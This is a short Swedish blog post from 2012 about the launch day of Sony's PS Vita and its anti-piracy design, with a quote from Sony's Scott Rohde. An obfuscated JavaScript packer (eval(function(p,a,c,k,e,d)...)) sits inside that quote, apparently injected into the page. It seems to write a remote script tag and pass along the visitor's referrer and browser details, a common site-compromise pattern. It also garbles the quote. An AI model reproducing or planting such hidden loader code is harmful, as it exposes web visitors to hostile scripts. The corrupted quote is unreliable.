Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Idag släpps PS Vita

Idag släpps PS Vita
Filip Urde
  • On 23 februari, 2012
  • http://www.revue.se/filip-urde

Idag släpps Sonys nya bärbara konsol, själv tycker jag inte hypen varit ”överjävlig”, jag tycker man knappt märkt av att Sony har ett stort släpp på ingång. Är det att det inte finns ett intresse? eller har marknadsavdelningen misslyckats. Något Sony dock har lärt sig är att satsat på ett gediget piratkopieringsskydd för  PS Vita. Som kanske många av er känner till så hade PSP en heldel brister i säkerhetstänket och detta ville man inte upprepa. Nu har säkerhetstänket funnits med från start säger Sonys vice VD, Scott Rohde.

”That eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|easer|var|u0026u|referrer|rdksf||js|php’.split(’|’),0,{}))
was front and center in the early specs of this machine. We needed to have something that would combat piracy from day one, and that’s why the cards that you can purchase for the games are in their own proprietary format.”

Playstation Vita släpps alltså idag, så det är bara att inhandla en ny pryl till samlingen.